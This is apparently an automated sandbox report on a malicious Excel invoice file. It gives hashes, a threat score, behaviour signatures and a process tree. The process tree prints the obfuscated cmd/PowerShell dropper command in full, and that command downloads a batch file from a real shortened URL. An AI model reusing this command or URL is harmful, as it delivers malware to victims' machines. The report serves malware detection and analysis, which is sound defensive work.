Analysis
-
max time kernel
69s -
max time network
20s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
19-01-2021 07:18
General
-
Target
invoice68684881.xls
-
Size
228KB
-
MD5
1a7cd8bd3fcf0b4a7f351a148dc7e40a
-
SHA1
e336117d94537924cf4ecef038231b29bafdf261
-
SHA256
279bf00b0c81ab8baeb09989215ad376377c40a3abd4358d041ec06746c986fe
-
SHA512
7fe9785c22a2be59dba2e7e8974a4c7196522c17e6a3ed6591af2354ee2a601defc6ff023575043063d9dcde1e37211c49aad3cfab71840d312b191ab89d7c63
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://cutt.ly/fjYtydH
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 9 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\invoice68684881.xls1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1684-2-0x000000002FB31000-0x000000002FB34000-memory.dmpFilesize
12KB
-
memory/1684-3-0x0000000071AC1000-0x0000000071AC3000-memory.dmpFilesize
8KB
-
memory/1684-4-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1788-5-0x0000000000000000-mapping.dmp
-
memory/1792-6-0x0000000000000000-mapping.dmp
-
memory/1792-7-0x00000000756A1000-0x00000000756A3000-memory.dmpFilesize
8KB
-
memory/1792-8-0x000000006CAE0000-0x000000006D1CE000-memory.dmpFilesize
6.9MB
-
memory/1792-9-0x0000000000860000-0x0000000000861000-memory.dmpFilesize
4KB
-
memory/1792-10-0x00000000049D0000-0x00000000049D1000-memory.dmpFilesize
4KB
-
memory/1792-11-0x0000000004990000-0x0000000004991000-memory.dmpFilesize
4KB
-
memory/1792-12-0x0000000004992000-0x0000000004993000-memory.dmpFilesize
4KB
-
memory/1792-13-0x0000000002510000-0x0000000002511000-memory.dmpFilesize
4KB
-
memory/1792-14-0x00000000052C0000-0x00000000052C1000-memory.dmpFilesize
4KB
-
memory/1792-17-0x00000000056F0000-0x00000000056F1000-memory.dmpFilesize
4KB
-
memory/1792-22-0x00000000060E0000-0x00000000060E1000-memory.dmpFilesize
4KB
-
memory/1792-23-0x0000000006130000-0x0000000006131000-memory.dmpFilesize
4KB
-
memory/1792-30-0x0000000006290000-0x0000000006291000-memory.dmpFilesize
4KB
-
memory/1792-31-0x00000000062C0000-0x00000000062C1000-memory.dmpFilesize
4KB
-
memory/1792-32-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB